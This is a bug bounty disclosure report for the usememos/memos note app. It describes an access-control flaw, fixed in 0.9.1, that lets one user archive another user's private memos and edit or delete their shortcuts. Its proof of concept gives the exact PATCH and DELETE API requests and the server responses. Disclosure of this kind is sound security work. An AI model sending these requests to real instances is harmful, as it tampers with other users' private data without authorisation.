Archive any private memos + Delete any Shortcut + Edit any Shortcut from other users in usememos/memos

Valid

Reported on

Dec 23rd 2022


Description

User can archive any private memos, Delete any Shortcut and Edit any Shortcut from other users via api

PATCH /api/memo/8 HTTP/1.1

{"id":8,"rowStatus":"ARCHIVED"}
PATCH /api/shortcut/2 HTTP/1.1

{"id":2,"title":"shortahihix","payload":"[]"}
DELETE /api/shortcut/2

Proof of Concept

Login to website in brower 1 with user A.

Login to website in brower 2 with user B.

Example: User B have private nemo with id 8.

With session in brower 1 with user A make a request

PATCH /api/memo/8 HTTP/1.1

{"id":8,"rowStatus":"ARCHIVED"}

And response

{"data":{"id":8,"rowStatus":"ARCHIVED","creatorId":1,"createdTs":1671805207,"updatedTs":1671805219,"content":"demo content","visibility":"PRIVATE","pinned":false,"displayTs":1671805207,"creator":{"id":1,"rowStatus":"NORMAL","createdTs":1671803462,"updatedTs":1671803845,"username":"userB","role":"HOST","email":"","nickname":"userB","openId":"","userSettingList":null},"resourceList":[]}}

Then memo with id equal to 8 was archived.

Demo video: https://drive.google.com/file/d/1FYpaZlktndUk9fmoCy8q7PAPMOARBOE1/view

Similar to Delete shortcut

Change id for request will receive response true

DELETE /api/shortcut/2 HTTP/1.1
Host: 127.0.0.1

Similar to Edit shortcut

Use request for edit any shortcut with id

PATCH /api/shortcut/2 HTTP/1.1

{"id":2,"title":"shortahihix","payload":"[]"}

The response received is as follows

{"data":{"id":2,"rowStatus":"NORMAL","creatorId":0,"createdTs":1671875414,"updatedTs":1671875430,"title":"shortahihix","payload":"[]"}}

POC video for edit and delete shortcut https://drive.google.com/file/d/1sIQ-OLXlDqvMDXMSJvicy9QO7rZDFobW/view

Impact

Anyone can archive other people memos.

We are processing your report and will contact the usememos/memos team within 24 hours. 5 months ago
Kevin Kien modified the report
5 months ago
Kevin Kien modified the report
5 months ago
Kevin Kien modified the report
5 months ago
We have contacted a member of the usememos/memos team and are waiting to hear back 5 months ago
STEVEN validated this vulnerability 4 months ago
Kevin Kien has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.9.1 with commit 3556ae 4 months ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 4 months ago
to join this conversation